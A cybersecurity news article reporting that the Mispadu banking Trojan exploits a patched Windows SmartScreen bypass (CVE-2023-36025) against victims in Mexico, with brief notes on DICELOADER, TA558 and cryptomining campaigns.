New Mispadu Banking Trojan Exploiting Windows SmartScreen Flaw

The threat actors behind the Mispadu banking Trojan have become the latest to exploit a now-patched Windows SmartScreen security bypass hole to attack victims in Mexico.

The attacks comprise a new strain of the virus that was first discovered in 2019, Palo Alto Networks Unit 42 said in a study issued last week.

Propagated via phishing mails, Mispadu is a Delphi-based information stealer reported to specifically infect victims in the Latin American (LATAM) region. In March 2023, Metabase Q discovered that Mispadu spam campaigns acquired no less than 90,000 bank account credentials since August 2022.

It's also part of the bigger family of LATAM financial malware, including Grandoreiro, which was eliminated by Brazilian law enforcement authorities last week.

The current infection chain uncovered by Unit 42 leverages rogue internet shortcut files placed within phony ZIP archive files that leverage CVE-2023-36025 (CVSS score: 8.8), a high-severity bypass issue in Windows SmartScreen. It was addressed by Microsoft in November 2023.

"This exploit revolves around the creation of a specifically crafted internet shortcut file (.URL) or a hyperlink pointing to malicious files that can bypass SmartScreen's warnings," security experts Daniela Shalev and Josh Grunzweig warned.

"The bypass is straightforward and relies on a parameter that references a network share, rather than a URL. The created .URL file contains a link to a threat actor's network share with a malicious binary."

Mispadu, once started, displays its true colors by selecting targeting victims depending on their geographic location (i.e., Americas or Western Europe) and system configurations, and then proceeds to establish contact with a command-and-control (C2) server for follow-on data exfiltration.

In recent months, the Windows weakness has been exploited in the wild by several cybercrime groups to distribute DarkGate and Phemedrone Stealer malware in recent months.

Mexico has also emerged as a top target for various campaigns over the past year that have been found to disseminate information stealers and remote access trojans including AllaKore RAT, AsyncRAT, Babylon RAT. This constitutes a financially-motivated group nicknamed TA558 that has attacked the hospitality and travel sectors in the LATAM region since 2018.

The development comes as Sekoia exposed the inner workings of DICELOADER (aka Lizar or Tirion), a time-tested custom downloader used by the Russian e-crime outfit monitored as FIN7. The malware has been observed distributed using infected USB drives (called BadUSB) in the past.

"DICELOADER is dropped by a PowerShell script along with other malware of the intrusion set's arsenal such as Carbanak RAT," the French cybersecurity firm said, calling out its sophisticated obfuscation methods to mask the C2 IP addresses and the network connections.

It also follows AhnLab's discovery of two new malicious cryptocurrency mining campaigns that exploit booby-trapped files and game hacks to distribute miner software that mine Monero and Zephyr.

Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive material we provide.